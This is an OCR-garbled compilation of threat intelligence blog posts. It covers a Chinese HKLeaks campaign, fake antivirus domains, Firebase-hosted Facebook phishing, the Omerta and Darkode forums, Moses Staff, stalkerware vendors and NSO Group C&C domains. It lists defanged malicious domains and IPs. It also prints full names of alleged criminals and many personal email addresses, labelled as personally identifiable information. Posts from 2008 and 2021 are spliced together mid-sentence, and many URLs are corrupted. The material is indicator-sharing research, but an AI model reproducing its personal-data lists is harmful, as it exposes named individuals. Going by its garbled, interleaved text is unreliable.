Approach - An Analysis 


Profiling Russia’s U.S Election Interference - WhoisXML API Analysis 


Profiling the “Jabber ZeuS” Rogue Botnet Enterprise - WhoisXML API Analysis 


Profiling the Emotet Botnet C &C Infrastructure - An OSINT Analysis 


Profiling the Internet Connected Infrastructure of the Individuals on the U.S Sanctions List 
-WhoisXML API Analysis 


Profiling the Liberty Front Press Network Online - WhoisXML API Analysis 


Profiling the U.S Election Interference - An OSINT Analysis 
¢ Random Photos from the “Lab” Circa up to Present Day - A Compilation 


* Sample Random Cybercrime Ecosystem Screenshots - A Compilation of Images - Direct 
Technical Collection Download - An Analysis 


Sample Random Cybercrime Ecosystem Screenshots - A Compilation of , Images - An 
Analysis 


Sample Random Cybercrime Ecosystem Screenshots - A Compilation of , Images - An 
Analysis 


Sample Random Cybercrime Ecosystem Screenshots - A Compilation of Images - An Anal- 
ysis 


Security Researchers Targeted in Spear Phishing Campaign - WhoisXML API Analysis 


Shots from the Wild West - Random Cybercrime Ecosystem Screenshots - An OSINT Anal- 
ysis - Part Three 


The Pareto Botnet - Advanced Cross-Platform Android Malware Using Amazon AWS Spotted 
in the Wild - WhoisXML API Analysis 


Who's Behind the Conficker Botnet? - WhoisXML API Analysis 


Who’s on Twitter? 


[10] 
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Stay tuned! 


)) Cybercrime_Forum_Data_Set_2021 

») Dancho_Danchev_Astalavista_Security_Newsletter_Compilation_2021 
Dancho_Danchev_Blog_Archive_JSON_2021 
Dancho_Danchev_Blog_Cybercrime_Research_Photos_Compilation_2021 
Dancho_Danchev_Blog_E-Book_Archive_2021 
Dancho_Danchev_Cyber_Threat_Actors_Analysis_Research_Compilation_2021 


= 


) Dancho_Danchev_Cybercrime_Research_2021_Personally_Identifiable_Information_Compilation 


Dancho_Danchev_Cybercrime_Research_Personal_Photos_Compilation_2021 
db Dancho_Danchev_Cybercrime_Research_Presentations_2021 
Dancho_Danchev_Intelligence_Community_2.0_Dark_Web_Onion_Backup_2021 
ad Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 
Dancho_Danchev_Iran_Hackers_Personally Identifiable _Information_Compilation_2021 
») Dancho_Danchev_Iran_White_Paper_2021 
Dancho_Danchev_Iran_White_Paper_Part_Two_2021 

) Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 
Dancho_Danchev_Malware_Trends_White_Paper_2021 
Dancho_Danchev_Medium_Research_Compilation_2021 
Dancho_Danchev_Personal_Memoir_Compilation_Research_2021 

) Dancho_Danchev_Personal_Photos_Compilation_2021 
Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 

& Dancho_Danchev_Security_Policy_White_Paper_2021 

& Dancho_Danchev_Twitter_Account_Archive_2021 

db Dancho_Danchev_Unit-123_Security_Research_Compilation_2021 

& Dancho_Danchev_Webroot_Research_Compilation_2021 
Dancho_Danchev_ZDNet_Research_Compilation_2021 
WhoisXML_API_Research_Articles_2021 


[11] 


Cybercrime_Forum_Data_Set_2021 

a Dancho_Danchev_Blog_Archive_JSON_2021 

& Dancho_Danchev_Blog_Cybercrime_Research_Photos_Compilation_2021 
)) Dancho_Danchev_Blog_E-Book_Archive_2021 


= 


Dancho_Danchev_Cybercrime_Research_Presentations_2021 


Dancho_Danchev_Intelligence_Community_2.0_Dark_Web_Onion_Backup_2021 
a Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 

ad Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 

a Dancho_Danchev_Personal_Photos_Compilation_2021 
Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 

aX Dancho_Danchev_Twitter_Account_Archive_2021 

WhoisXML_API Research_Articles_2021 


= 


Dancho_Danchev_Cybercrime_Research_2021 Personally Identifiable _Informat... 


18359 


1. 
2. 

3. 

4. 
5. 
6. 
7. 
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17.10.21 From China With "Love" - Exposing the HKLeaks Propaganda Campaign - 
An OSINT Analysis (2021-10-29 11:36) 


I’ve recently came across to a currently active information warfare operation propaganda cam- 
paign courtesy of China that somehow aims to successfully identify protesters using a variety 
of "leak" based Web sites. 


In this analysis I'll provide actionable intelligence on the whereabouts of the individuals behind 
these campaigns and offer an in-depth technical discussion on their online whereabouts. 
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Based on a variety of publicly accessible sources including the use of WhoisXML API’s WHOIS 
database I’ve managed to find the following domains which are known to have been involved in 
the campaign including one personally identifiable email address which could lead to possible 
cyber campaign attribution campaigns. 


Sample domains known to have been involved in the HKLeaks information warfare propa- 
ganda campaign: 


hxxp://hkleaks.pk 

hxxp://hkleaks.ru 

hxxp://hkleaks.pk 

hxxp://hkleaks.tj 

hxxp://hkleaks.ml - Email: spiker@elude.in 
hxxp://hkleaks.af 

hxxp://hkleaks.cc 

hxxp://hkleaks.pw 

hxxp://hkleaks.kz 


hxxp://hkleaks.kg 
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Sample email address accounts known to have been involved in the campaign: 


hkleaks@yandex.com 


hongkongmob@163.com 


Hongkongmob@protonmail.com 


hongkongmob@yandex.com 


Sample responding IPs known to have been involved in the campaign: 


185.178.208.132 
185.178.208.152 
96.126.123.244 
194.58.112.174 
45.33.18.44 
45.33.23.183 
72.14.178.174 
186.2.163.203 
45.33.20.235 
72.14.185.43 
173.255.194.134 
45.79.19.196 
186.2.163.140 
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4.8.21 A Diverse Portfolio of Fake Security Software - Part Four (2008-08-25 12:03) 


on ¢ 


wow uw 
— = oO oO 
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virus-quick-scan.com 
irus-quick-scan,com 
virus-quick-scan.com 
virus-quick-scan.com 
winprivacytool,com 
virus-quick-scan.corm 
irus-qu can.com 
virus-qu can.com 
virus-qu can.com 
security n-pc,.com 
ecure-protection,com 
ty-scan-pc.com 
nner-online.com 
§-scanonline.com 
canonline.com 
antivirus-scanonline.com 
antivirus-scanonline.com 
antivirus-scanonline.com 
-171.myrdns.com 
antivirus-scanonline.com 
antivirus-scanonline.com 
an-pc,.com 
canonline.com 
ware2008.com 
naster,.com 
irus???.com 
antivirus?7?7.com 
Pywyrantivir 
img. malware-scan.com 
img. malware-scan.com 
img. malware-scan.com 
malware-scan.com 
img. malware-scan,com 
*pertantivirus.com 
img. malware-scan,com 


canonline.com 


spyware-quickscan-2 


canner.com 
ure-protection.com 
¥-scan-pc,.com 
nner-online.com 
anonline.com 
yirus-scanonline,.com 
ifus-scanonline, com 
an,com 
can.com 
rity-protection,com 
infectionscanner.com 
yvirusbestscanner.com 
Full-protection-now,com 
Fast-pc-scanner-online.com 
topantispyware2008.com 
cleanermaster.com 
antivirus?77.com 
pcsecuritynotice.com 
Pwrantivirus.com 
-scanner,.com 


canner.com 


Ces 


Scanner 
*pertantivirus.com 
Scanner-xpertantivirus,com 


rity-protection.com 


Thanks to the affiliate based business model that’s driving the increase of fake security 
software and rogue codecs serving domains, the very same templates, but with different 
domain names, continue appearing in blackhat SEO, spam, and malicious doorways redirection 
campaigns. 


Moreover, with the "time-to-market" of a fake security software decreasing due to the 
efficiency approach introduced in the form of tips for abuse-free hosting services provided 
by the "known suspects", and the freely available templates, we’re slowly starting to see the 
upcoming peak of this approach. 
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45.56.79.23 
186.2.163.60 
186.2.163.7 
45.33.2.79 
186.2.163.210 
198.58.118.167 
185.53.177.31 
45.33.30.197 
186.2.163.216 


Sample related photos from the HKLeaks information warfare online propaganda campaign: 
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Stay tuned! 


17.10.22 Massive "Facebook Appeal" Themed Phishing Campaign Uses Google’s Fire- 
base Spotted in the Wild - An OSINT Analysis (2021-10-29 11:48) 


 £) Help Centre 
Using Facebook 
@ Creating as Accowe 
& trending 

{2 You Home Page 

2 Memaging 


(D Stories 


Appeal Form 


(@) You Protos asd Videos 
(2) Videos on Watch 


if you think your page was restricted by mistake, please fill out this form 


Appeal a Page Policy Viotation 


| just came across to a currently active phishing campaign that’s using Google’s Firebase as a 
hosting infrastructure for the purpose of enticing users into falling victim into a rogue and fake 
"Facebook Appeal" themed phishing campaign. 
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You can check out my initial analysis at my official Dark Web Onion [1]here as my initial post 
got censored by Google as it violates its Terms of Service. 


Sample malicious and rogue phishing domains known to have been involved in the campaign: 
hxxp://publicaccount-facebook-46956.web.app 
hxxp://publicappeal-348239237392.web.app 
hxxp://publicappeal-9344858302239.web.app 
hxxp://publicappeal-facebook.web.app 
hxxp://publicappeal-form-fb-copyright102872.web.app 
hxxp://publicappeal-form-fb-copyright104352.web.app 
hxxp://publicappeal-form-fb-copyright119275.web.app 
hxxp://publicappeal-form-fb-copyright126776.web.app 
hxxp://publicappeal-form-fb-copyright171651.web.app 
hxxp://publicappeal-form-fb-copyright18251.web.app 
hxxp://publicappeal-form-fb-copyright18258.web.app 
hxxp://publicappeal-form-fb-copyright18274.web.app 
hxxp://publicappeal-form-fb-copyright18275.web.app 
hxxp://publicappeal-form-fb-copyright182755.web.app 
hxxp://publicappeal-form-fb-copyright18721.web.app 
hxxp://publicappeal-form-fb-copyright187265.web.app 
hxxp://publicappeal-form-fb-copyright187285.web.app 
hxxp://publicappeal-form-fb-copyright18762.web.app 
hxxp://publicappeal-form-fb-copyright19285.web.app 
hxxp://publicappeal-form-fb-copyright19827.web.app 
hxxp://publicappeal-form-fb-copyright981725.web.app 
hxxp://publicappeal-form-page-unpublish1897.web.app 
hxxp://publicappeal-from-fb-copyright12352.web.app 
hxxp://publicappeal-from-fb-copyright12857.web.app 
hxxp://publicappeal-page-unpublish-1827589.web.app 
hxxp://publicappeal-page-unpublish1107276.web.app 
hxxp://publicappeal-page-unpublish118172861.web.app 
hxxp://publicappeal-page-unpublish18275.web.app 
hxxp://publicappeal-page-unpublish182758.web.app 
hxxp://publicappeal-page-unpublish1827586.web.app 
hxxp://publicappeal-page-unpublish1827588.web.app 
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hxxp://publicappeal-page-unpublish182759.web.app 
hxxp://publicappeal-page-unpublish18278652.web.app 
hxxp://publicappeal-page-unpublish1827890.web.app 
hxxp://publicappeal-page-unpublish187-36ac4.web.app 
hxxp://publicappeal-page-unpublish187265.web.app 
hxxp://publicappeal-page-unpublish18769.web.app 
hxxp://publicappeal-page-unpublish1906392.web.app 
hxxp://publicbusiness-appeal-form-129862.web.app 
hxxp://publicbusiness-appeal-form125921.web.app 
hxxp://publicfacebookappeal110631.web.app 
hxxp://publicfo-appeal-form-29997.web.app 
hxxp://publicfo-appeal-form-70f46.web.app 
hxxp://publicfb-appeal-form-791bd.web.app 
hxxp://publicfo-appeal-form-8276f.web.app 
hxxp://publichouse-h3.web.app 
hxxp://publicpage-appeal-unpublish1253631.web.app 
hxxp://publicproject-8595314475285305009.web.app 
hxxp://publicrestriction-appeal-business128.web.app 
hxxp://publicreview2024545897534.web.app 


Stay tuned! 


1. http://aklw6fojficmu3zqsdsffprbas3kqrhee j4ntvynf15xkr jpqhlq55yd. onion/wordpress/2021/10/21/massive-phishi 


ng-campaign-domain-farm-spotted-in-the-wild-uses-google 


17.10.23 Profiling a Currently Active Brian Krebs Themed Online E-Shop for Stolen 
Credit Cards - An OSINT Analysis (2021-10-29 16:27) 


[1] 
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I’ve recently came across to a pretty interesting Brian Krebs themed E-Shop for stolen credit 
cards information and I’ve decided to share with everyone actionable intelligence with the idea 
to assist everyone with their cyber attack attribution campaigns. 


Sample related malicious domains known to have been involved in the campaign: 


hxxp://briankrebs.at 


hxxp://briankrebs.cm 


Stay tuned! 


1. https://1.bp.blogspot.com/-CsATx1QDmks/YXwAN5 JtXfI/AAAAAAAAUGQ/mwQIATzfaoQnmT j4rwBx2F8141ttwcWuQCLcBGAsYHQ 
$1920/download/%2B/,25282/2529 . jpg 
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17.10.24 Profiling the Omerta Cybercrime-Friendly Forum Community - An OSINT 
Analysis (2021-10-29 16:27) 


EN 


Dumps & Cards 


_ BIGGESTSHOP > 


In this post I’ve decided to share with everyone actionable intelligence regarding the infamous 
cybercrime-friendly forum community known as Omerta with the idea to assist everyone with 
their cyber attack attribution campaigns. 


Related personal emails known to have been involved in the campaign: 
omerta.sup@gmail.com 
suppa.sale@gmail.com 


Sample related Omerta cybercrime-friendly forum domains known to have participated in the 
campaign: 


hxxp://omerta.cc 
hxxp://omerta.wf 
hxxp://omerta.ws 
hxxp://omerta.mn 
hxxp://omerta.cx 
hxxp://omerta.ms 
hxxp://omerta.vc 
hxxp://omertadns.biz 
hxxp://cc101.biz 
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hxxp://omerta.vc 


hxxp://omerta.mn 


hxxp://monodsp.xyz 


hxxp://gipertorrent.com 


hxxp://securetheborder.us 


hxxp://autorsite.com 


hxxp://rtk.expert 


hxxp://seoptex.com 


hxxp://buybestdumps. biz 


hxxp://buy-dumps-online.com 


hxxp://7ap.biz 


hxxp://buy-dumps-online.com 


hxxp://mediation-plus-coaching.com 


hxxp://2tracks.biz 


hxxp://bestdumps. biz 


Stay tuned! 


17.10.25 Exposing "Moses Staff" Data Leaks Gang 


(2021-10-29 16:27) 


[1] 


An 


OSINT Analysis 
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+. 
N 

I’ve recently came across to a currently active data leaks campaign launched by a newly formed 
hacking and data leaks group and I’ve decided to share with everyone an in-depth technical 


and relevant OSINT analysis with the idea to assist everyone with their cyber attack attribution 
campaigns. 


Sample related domains known to have been involved in the campaign: 
https://moses-staff.se 

http://mosesstaffm7hptp.onion 

https://t.me/Moses _staff se 

https://twitter.com/moses _staff se 

Sample related IPs known to have been involved in the campaign: 
185.206.180.138 


95.169.196.52 


[2] 
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MOSES Home Activities Tor Website Pap Contact av 


Activities 
Pd 
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Fi of mod First of 
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DOSIK Technology Meshulam Electron Csillag Gidel company 


[3] 


[4] 
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In a true proactive spirit, the domains parked at 216.195.56.88 are all upcoming fake 
security software, to be introduced anytime soon. 


fast-pc-scanner-online .com - (92.62.101.41; 91.203.92.48; 91.203.92.106; 58.65.238.171) 
top-pc-scanner .com 
buy-secure-protection .com 
security-scan-pc .com 
pc-scanner-online .com 
viruses-scanonline .com 
virus-scanonline .com 
antivirus-scanonline .com 
topvirusscan .com 
virusbestscan .com 
best-security-protection .com 
infectionscanner .com 
virusbestscanner .com 
full-protection-now .com 


Pwrantivirus .com - 91.208.0.246 
Vav-x-scanner .com 

Vav-scanner .com 
scanner.vavscan .com 
malware-scan .com 
Scanner-Pwrantivirus .com 
Xpertantivirus .com 
Scanner-xpertantivirus .com 


spyware-quickscan-2008 .com - (216.195.56.88) 
virus-quickscan-2008 .com 
spyware-quickscan-2009 .com 
virus-quickscan-2009 .com 

winmalwarecontrol .com 
antispyware-quick-scan .com 

virus-quick-scan .com 

antivirus-quick-scan .com 

winprivacytool .com 


topantispyware2008 .com - (216.195.56.86) 
cleanermaster .com - (216.195.56.85) 
antivirus777 .com - (67.228.120.3) 
pcsecuritynotice .com - (67.228.120.3) 


Whereas the average Internet users are falling victims into this type of fraud, what I’m 
more concerned about is the large traffic the malicious domains receive in general due to all 
the different traffic acquisition tactics the people behind them apply. This anticipated traffic 
can then be greatly used as valuable metrics for the many other malicious ways in which it 
can be monetized. 


Ironically, the participant in the affiliate program whose original objective was to drive 
traffic to the fake security software’s site, may in fact start receiving so much traffic due to 
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17.10.28 Exposing the Darkode Forum Bust and the Associated Individuals Behind 
It - Or How I Almost Got Kidnapped? - An OSINT Analysis (2021-10-30 19:19) 


I’ve decided to share with everyone an in-depth analysis and assessment using public sources 
that basically exposes key members of the Darkode forum community who actually ordered a 
hitman for me for the price of $10,000 back in 2010 prior to my illegal arrest and kidnapping 
attempt. 


In this post I’ll provide actionable intelligence on their online whereabouts with the idea to 
assist U.S Law Enforcement on its way to track down monitor and prosecute the cybercriminals 
behind these campaigns. 


Sample Darkode forum domains active at the time: 
hxxp://darkode.com - briankrebson@gmail.com 
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hxxp://darkode.pro 

hxxp://darkode.com 

hxxp://darkode.me 

hxxp://darkode.cc 

hxxp://darkode.su - Email: ctouma2@gmail.com 


Sample names of key members of the Darkode forum community: 
Johan Anders Gudmunds 
Morgan C Culbertson 
Eric L Crocker 
Naveed Ahmed 
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Phillip R Fleitz 

Dewayne Watts 

Murtaza Saifuddin 

Daniel Placek 

Matjaz Skorjanc 

Florencio Carro Ruiz 

Mentor Lenigi 

Rory Stephen Guidry - k@exploit.im 


white hat info 


Sample personally identifiable information on key members of the Darkode forum community: 
hotcoffeecup@jaim.at 
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s3x@neko.im 
Arcore@jabber.org 
sana@thesecure. biz 
silicOn@jabber.org 
split@thesecure.biz 
ihack@thesecure.biz 
systro@jabber.org 
mafioso@xmpp.jp 
zerOday@xmpp.jp 
c4rlOs@jabber.ru 
ipwn@cih.ms 
hOtshOt@jodo.im 
jumbie@jabber.ru 
off-sho.re@jabber.vc 
x0x@jabba.biz 


bestkrypt@rkquery.de bestkrypt - Email: annabellablibgs@hotmail.com - Email: apetro- 
vskiy@evermail.org 


elzig@exploit.im 
na@exploit.im 
m3gatrOn@jabber.ru 
nassef@thesecure. biz 
teardrop@swissjabber.ch 
gamoonty@xmpp.jp 
mojitka@jabber.org 
the _bond@jabber.org 
rzor@jabber.org 
x47@xmpp.jp 
mrborisb@xmpp.jp borisb 
RG.JRY@thesecure. biz 
zigma@jabber.org 
propack@neko.im 
dilibau@qip.ru 
r3vproxy@jabber.org 
synthetic@exploit.im 
lingO@jabber.ru 
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Including the following C &C domains that were registered at the time: 
upaskitvl.org - Email: jgou.veia@gmail.com 

xylibox. biz 

krebsonsecurity.biz 

upaskitversion1.biz 

stevenk.biz 

briankrebs.biz 

upaskit1.biz 

researchsecurity. biz 

securityresearch.biz 


amatrosov.biz 


Related C &C server domains that are known to have been registered at the time: 
upasdomination.ru 
exposedbotnets.ru 


researchsecurity. biz 


Related C &C server domains known to have been registered at the time: 


hfgfr56745fg.com - 80.82.66.204 


Sample personal photos of key members of the Darkode forum community that were basi- 
cally responsible for ordering a hitman to look for me for the price of $10,000 and actively 
communicated between each other during my disappearance and kidnapping attempt: 
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Stay tuned! 
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the combination of traffic acquisition tactics, that [L]introducing client-side exploits courtesy 
of a third-party affiliate network, may in fact prove more profitable then the revenue sharing 
partnership with the rogue security software’s vendor at the first place. 


Related posts: 

[2]A Diverse Portfolio of Fake Security Software - Part Three 
[3]A Diverse Portfolio of Fake Security Software - Part Two 
[4]Localized Fake Security Software 

[5]Diverse Portfolio of Fake Security Software 

[6]Got Your XPShield Up and Running? 

[7]Fake PestPatrol Security Software 

[8]RBN’s Fake Security Software 

[9]Lazy Summer Days at UkrTeleGroup Ltd 
[10]Geolocating Malicious ISPs 

[11]The Malicious ISPs You Rarely See in Any Report 


. http: //ddanchev. blogspot . com/2008/02/serving-malware-through- advertising .html 
ttp://ddanchev.blogspot.com/2008/08/diverse-portfolio-of-fake-security_20.htm 
[ep //atenchay blogapet. con/2006/06/atverserportfelio-of tater security. neal 
hetp://adanchey. blogspot. cou/2008/04/1ocalized-fake-security-softvare. ntl 
SZ TT TONS 
ee ee 
_hvtp://adanchey. blogspot. con/2008/06/take~pestpatrel-securit)-softvare. html 
See reer see TO eT 
_hvtp://adanchey. blogspot. cou/2008/0T /1azy-sumer~days~at~ubxtelegroup-Téds. heal 
10, eep://adunchevblogepet, con/2000/02/geotocabingrwulicious tape tal 
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ttp://ddanchev. blogspot .com/2008/06/malicious-isps-you-rarely-see-in-any.htm 


4.8.22 Automatic Email Harvesting 2.0 (2008-08-26 12:35) 
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The World's Most Popular and Often Cited Security Blog! 


Dear blog readers, 
I’ve just launched a daily Vlog and | wanted to share the news. 
Subscribe [2]here. 


Here’s the first episode. 


Stay tuned! 


1. https://1.bp.blogspot. com/-m1MHA1ZgZfY/YYJErwk_881/AAAAAAAAY_0/UQwDoMq1Fo4KQF 3rhbmF06i- ISu5WElbgCLcBGAsYHQ 
s1280/Dancho_Danchev_Vlog_01.png 
2. https://youtu.be/SOtxaPHYe2E 
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17.11.2 U.K and Australia Launch "Think Before You Link" Counter Espionage Using 
Social Media Awareness Campaign - An Analysis (2021-11-27 14:14) 


The U.K and Australia have recently launched an extremely popular and relevant "[1]Think 
Before You Link" counter-intelligence social media link sharing security awareness building 
Campaign that aims to spread awareness on the use of "foreign information seeking" foreign 
third-parties who will somehow benefit and expose sensitive national security information to 
third-parties. 


Sample video from the "Think Before You Link" security awareness raising campaign: 
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Users are advised to report suspicious activity using the [2]following portal. 


1. https://www.cpni.gov.uk/security-campaigns/think-you-link 


2. https://nitro.asio.gov.au/ 


17.11.3 Avast Joins the Stalkerware Coalition - An Analysis (2021-11-27 14:15) 


[1] 
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According to a blog post on [2]Avast’s blog the company is among the latest information 
security and antivirus companies to join the [3]Stalkerware coalition in an attempt to prevent 
the mass distribution and possible widespread campaigns caused by boutique stalkerware 
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applications which are often used by end users to spy on their friends and colleagues 
including family and relatives. 


[4] 
OC '* __—_——7:, © as = 
Index of 
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According to a recently released [5]research and presented at the Virus Bulletin conference 
by ESET’s Lukas Stefanko the company managed to find out that on the majority of occasions 
stalkerware applications are poorly coded and often represent a security and privacy risk for 
the actual stalker and user of the application and that they fall victim to a variety of security 
flaws and vulnerabilities which often include the actual compromise of already collected and 
gathered information by third-parties. 


Sample actionable intelligence on some of the currently active stalkerware variants spotted 
in the wild by ESET’s Lukas Stefanko include: 


hxxp://aispyer.com 
hxxp://alltracker.org 
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hxxp://androidmonitor.com 
hxxp://antifurtodroid.com 
hxxp://appmia.com 
hxxp://appspyfree.com 
hxxp://a-spy.com 
hxxp://blurspy.com 
hxxp://catwatchful.com 
hxxp://cerberusapp.com 
hxxp://clevguard.com 
hxxp://cocospy.com 
hxxp://copy9.com 
hxxp://coupletracker.com 
hxxp://ddiutilities.com 
hxxp://easemon.com 
hxxp://logger.mobi 
hxxp://easyphonetrack.com 
hxxp://flexispy.com 
hxxp://fonetracker.com 
hxxp://myfonemate.com 
hxxp://fonemonitor.co 
hxxp://foreverspy.com 
hxxp://freeandroidspy.com 
hxxp://guestspy.com 
hxxp://highstermobile.com 
hxxp://noverwatch.com 
hxxp://ikeymonitor.com 
hxxp://imonitorke.com 
hxxp://109.235.66.53 
hxxp://ispyoo.com 
hxxp://theispyoo.com 
hxxp://jjspy.com 
hxxp://trackmyphones.com 
hxxp://letmespy.com 
hxxp://androidlost.com 
hxxp://callsmstracker.com 
hxxp://meuspy.com 
hxxp://minspy.com 
hxxp://mtoolapp.net 
hxxp://mobiletool.ru 
hxxp://mtoolapp. biz 
hxxp://mobile-tracker-free.com 
hxxp://mobilespy.at 
hxxp://mobistealth.com 
hxxp://mspy.com 
hxxp://mxspy.com 
hxxp://neatspy.com 
hxxp://neospy.net 
hxxp://neospy.pro 
hxxp://neospy.tech 
hxxp://netspy.net 
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hxxp://en.ownspy.com 
hxxp://phonesheriff.com 
hxxp://phonespying.com 
hxxp://trackmyphones.com 
hxxp://reptilicus.net 
hxxp://shadow-spy.com 
hxxp://sap4mobile.com 
hxxp://snoopza.com 
hxxp://spappmonitoring.com 
hxxp://spytomobile.com 
hxxp://spycell.net 
hxxp://spyhuman.com 
hxxp://spyic.com 
hxxp://spyier.com 
hxxp://spyine.com 
hxxp://spylive360.com 
hxxp://spyfone.com 
hxxp://spyphone.com 
hxxp://phonetracker.com 
hxxp://spytoapp.com 
hxxp://spyzee.com 
hxxp://spyzie.io 
hxxp://trackview.net 
hxxp://89.47.91.131 
hxxp://wt-spy.com 
hxxp://xnore.com 
hxxp://talklog.tools 
hxxp://teensafe.net 
hxxp://thetruthspy.com 
hxxp://tispy.net 
hxxp://trackmyphones.com 
hxxp://spyequipmentuk.co.uk 
hxxp://usafe.ru 


Sample personally identifiable information on the actual stalkerware domains which could 
assist in possible cyber attack attribution and cyber attribution campaigns: 


5LLIQUIDATION@GMAIL.COM 
ad20nikunj@gmail.com 
bytepioneers@gmail.com 
ciucaandrei@yahoo.com 
dalyjohns@yahoo.com 
de.russcity@gmail.com 
e.tabunow@gmail.com 
ernesto2020@yandex.com 
gad2005@bk.ru 
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gooveg@gmail.com 
immobilespy@yahoo.com 
ispyoo@yahoo.com 
itix.lIc@gmail.com 
jacksrow1980@gmail.com 
jerry-howard@hotmail.com 
jjmomanyis@gmail.com 
jordanlevexier@gmail.com 
karanthsrihari@gmail.com 
m2mstat@gmail.com 
micro.freetracker@gmail.com 
mobileinnova@gmail.com 
mspycotherg@gmail.com 
pavel _mikhailov@mail.ru 
pub144@hotmail.com 
puja2rani@gmail.com 
reshamkdk@gmail.com 
ronaldoblumenthal@gmail.com 
sqlove@gmail.com 
sriharikaranth@gmail.com 
theisborg@gmail.com 
twhannal3@yahoo.com 
wirelessha@yahoo.com 
zee.zaragoza@gmail.com 


1. https://1.bp.blogspot.com/-p5vtaXyAb10/YaH9gWMvUCI/ AAAAAAAAZAg/C1imrwb_2NzAsxLMwF4NZUgHj ikKp7uY1KgCLcBGAsYHQ 


s480/2021-11-CAS_membership_some-logos- 480x290. png 


ttps://blog.avast .com/celebrating-coalition-against-stalkerware-achievements-avast 


3. https://stopstalkerware.org/ 


4. https://1.bp.blogspot.com/-X_CmIc4wOpw/YaH9ikhpVxI/AAAAAAAAZAK/30xM6GGQnQQVb3GPcJruxI gXR_ed97SXwCLcBGAsYHQ 


s607/Screenshot_2.png 


5. https://vblocalhost.com/uploads/VB2021-Stefanko. pdf 
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17.11.4 Israel’s Spyware Vendor NSO Group Restrics Spyware Exports List to 37 
Countries Only - An Analysis (2021-11-27 14:16) 


COD 


v 
" nso GROUP 


Taking into consideration the recent U.S Sanctions against the infamous Israel-based Spyware 
vendor NSO Group the company has recently shortened the list of countries allowed to purchase 
its spyware products which currently include the following countries: 
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The current NSO Group Spyware vendor list of countries where it’s allowed to sale its products 
in 2021 include: 


"Australia, Austria, Belgium, Bulgaria, Canada, Croatia, Cyprus, Czech Republic, Denmark, Es- 
tonia, Finland, France, Germany, Greece, Iceland, India, Ireland, Italy, Japan, Latvia, Liecht- 
enstein, Lithuania, Luxembourg, Malta, New Zealand, Norway, Portugal, Romania, Slovakia, 
Slovenia, South Korea, Spain, Sweden, Switzerland, the Netherlands, the UK, and the US." 


What should be kept into consideration about the infamous NSO Group Spyware vendor is 
that it’s just the tip of the iceberg in terms of commercially obtainable or proprietary available 
spyware aiming to affect dissidents and political activists globally and that the market share 
shouldn’t be necessarily taken into consideration when profiling one of the market leading 
commercial vendors of spyware targeting various restrictive governments across the globe. 


The following are publicly accessible NSO Group Spyware vendor C &C (Command and Con- 
trol) server IPs which you should definitely consider blocking in terms of protecting from yet 
another spyware vendor out there in terms of keeping in mind that the NSO Group Spyware 
vendor is just the tip of the iceberg when it comes to commercial or proprietary spyware 
vendors: 


14-tracking.com 
1minto-start.com 
24-7clinic.com 
301-redirecting.com 
365redirect.co 
3driving.com 
456h612i458g.com 
7style.org 
800health.net 
911higlicarcay959454.com 
aalaan.tv 
accomodation-tastes.net 
accountant-audio.com 
accountcanceled.com 
accountnotify.com 
accountsections.com 
accounts.mx 
activate-discount.com 
active-folders.com 
actorsshop.net 
actu24.online 
add-client.com 
additional-costs.com 
addmyid.net 
addresstimeframe.com 
adeal4u.co 
ad-generator.net 
adjust-local-settings.com 
adjustlocalsettings.net 
adscreator.net 
adsload.co 
ad-switcher.com 
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advert-time.com 
advert-track.com 
afriquenouvelle.com 
agilityprocessing.net 
aircraftsxhibition.com 
ajelnews.net 
akhbara-aalawsat.com 
akhbar-aliqtisad.com 
akhbar-arabia.com 
alawaeltech.com 
albumphotopro. biz 
alignmentdisabled.net 
alive2plunge.com 
allafricaninfo.com 
allbeautifularts.com 
alldaycooking.co 
allergiesandcooking.com 
allfadiha.co 
alljazeera.co 
allladiesloveme.com 
all-sales.info 
allthecolorsyoulike.com 
allthegamesyouneed.com 
allthemakeupyouneed.com 
allthesongsyoulike.com 
alluneed4home.net 
alpharythme.com 
android-core.org 
android-updates.net 
apiapple.com 
apigraphs.net 
apiwacdn.com 
appleleaveit.co 
applicationcreation.net 
appointments-online.com 
appsgratis.com.mx 
appsjuegos.com.mx 
arabnews365.com 
arab-share.com 
arabworld.biz 
arabworldnews.info 
a-redirect.com 
a-resolver.com 
around-theglobe.co 
arrowowner.com 
ar-tweets.com 
asrararabiya.co 
asrararablya.com 
aSrarrarabiya.com 
assembled-battery.com 
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atlaslions.info 
audienceflake.com 
auditorcast.com 
authenticangry.com 
authenticated-origin.com 
authlovebirth.com 
autodiscount.info 
autoredirect.net 
avocadofight.com 
av-scanner.com 
awardpractice.com 
axis-indication.net 
babies-bottles.com 
bahrainsms.co 
balancewreckpoint.com 
banca-movil.com 
bankportal.net 
baramije.net 
bargainservice.online 
bbc-africa.com 
bdaynotes.com 
beanbounce.net 
beautifulhousesaroundme.com 
becomeiguana.com 
beethoventopsymphonies.com 
behindaquarium.com 
benjamin-taganga.info 
bestadventures4u.com 
bestcandyever.com 
bestday-sales.com 
bestfoods.co 
bestfriendneedshelp.com 
bestheadphones4u.com 
besthotelsaroundme.com 
bestperfumesnow.com 
bestpresents4all.net 
bestsalesaroundme.com 
beststores4u.com 
bestsushiever.com 
betterapplesearch.com 
better-deal.info 
betterhandsblack.com 
bicyclerentalnow.com 
biggunsarefun.com 
bigseatsout.net 
billednorth.com 
birdbathmorning.com 
biscuit-taste.net 
bitanalysis.net 
bitfadepens.com 
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Just [1]when you think that [2]email harvesting matured into user names harvesting in a true 
Web 2.0 style with the recently uncovered harvested [3]IM screen names, and [4]Youtube user 
lists for spammers, phishers and malware authors to take advantage of, someone has filled in 
the gap that’s been around as long as email harvesting has been a daily routine for soammers - 
dealing with text obfuscations which still remain highly popular online, once it became evident 
that spammers are in fact crawling for default mailto lines. This email harvesting module 
can be run a separate script, or get integrated as a module within any botnet, is capable of 
harvesting the following text obfuscations often used in order to prevent spamming crawlers : 


mail@mail.com 
mail[at]mail.com 
mail[at]mail[dot]com 

mail [space]mail [space]com 
mail(@)mail.com 
mail(a)mail.com 

mail AT mail DOT com 


The overall availability and easy of obtaining a huge percentage of valid email addresses 
within an organizaton, is not just resulting in the increasing [5]segmentation and localization 
of spam, phishing and malware campaigns, it’s increasing the profit margins for the spamming 
providers which is now not just [6]Joffering verified to be 100 % valid email addresses, but also, 
